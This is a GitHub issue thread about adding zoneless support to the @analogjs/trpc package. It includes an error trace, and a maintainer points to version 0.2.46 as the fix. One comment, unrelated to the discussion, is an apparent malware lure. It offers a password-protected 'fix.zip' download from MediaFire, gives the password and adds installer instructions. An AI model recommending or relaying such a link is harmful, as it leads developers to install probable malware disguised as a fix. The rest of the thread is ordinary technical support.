### ISSUE TITLE
Feature: Add support for Zoneless configuration to tRPC package

### ISSUE THREAD

**Issue by brandonroberts** [analogjs/analog#1295]
Hey @brandonroberts, thanks for the recent changes towards supporting zoneless apps! :)

Tried setting up a zoneless (analog) app in my demo monorepo. Having problems removing `zone.js` imports I found this issue. I setup the demo app to use the trpc integration and was running into the following problem:
```
NG05000: Angular detected that hydration was enabled for an application that uses a custom or a noop Zone.js implementation. This is not yet a fully supported configuration. Find more at https://angular.dev/errors/NG05000
Angular is running in development mode.
/…/node_modules/@analogjs/trpc/fesm2022/analogjs-trpc.mjs:384
    const macroTask = Zone.current.scheduleMacroTask(`AnalogContentResolve-${Math.random()}`, () => { }, {}, () => { });
                      ^

ReferenceError: Zone is not defined
    at Module.waitFor (/…/node_modules/@analogjs/trpc/fesm2022/analogjs-trpc.mjs:384:23)
    at new AnalogWelcomeComponent (/…/apps/analog-commerce/src/app/pages/analog-welcome.component.ts:73:36)
    at NodeInjectorFactory.AnalogWelcomeComponent_Factory [as factory] (/…/apps/analog-commerce/src/app/pages/analog-welcome.component.ts:94:94)
    at getNodeInjectable (/…/node_modules/@angular/core/fesm2022/core.mjs:6066:44)
    at instantiateAllDirectives (/…/node_modules/@angular/core/fesm2022/core.mjs:12813:27)
    at createDirectivesInstances (/…/node_modules/@angular/core/fesm2022/core.mjs:12209:5)
    at ɵɵelementStart (/…/node_modules/@angular/core/fesm2022/core.mjs:24369:9)
    at Module.ɵɵelement (/…/node_modules/@angular/core/fesm2022/core.mjs:24427:5)
    at HomeComponent_Template (/…/apps/analog-commerce/src/app/pages/(home).page.ts:12:35)
    at executeTemplate (/…/node_modules/@angular/core/fesm2022/core.mjs:12169:9)

Node.js v18.20.4
```

Looking at this error and your [pr](https://github.com/analogjs/analog/pull/1284/files), I'm  pretty sure we need an early return at [this](https://github.com/analogjs/analog/blob/9bec368abc49b6ef08992d8c5bfcc2f1638eab20/packages/trpc/src/lib/utils/wait-for.ts#L9 ) location aswell. What do you think?

_Originally posted by @tobiasegli in https://github.com/analogjs/analog/issues/1047#issuecomment-2308933031_

**Comment by haohaohaoadsad** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by tsironis13** [comment]
@brandonroberts  hello I am trying to migrate an Analog app to zoneless mode and I am getting the following warning and error respectively:
<img width="934" alt="image" src="https://github.com/user-attachments/assets/b77eb0d5-ad12-42b1-a904-652ddd568b8e">
<img width="944" alt="image" src="https://github.com/user-attachments/assets/e657d435-42a9-458a-b253-42e5738d7923">

Are there any migration guides to resolve this issue?

**Comment by brandonroberts** [comment]
@tsironis13 you need to update to `@analogjs/trpc` version `0.2.46` that includes zoneless support

**Comment by tsironis13** [comment]
> @tsironis13 you need to update to `@analogjs/trpc` version `0.2.46` that includes zoneless support

@brandonroberts  thanks! the error disappeared...the warning is still there but I suppose it does not affect how the hydration operates after migrating to zoneless.

**Comment by brandonroberts** [comment]
Good. As far as I know, hydration is not fully supported in Angular with Zoneless yet, so that must first be fixed upstream.
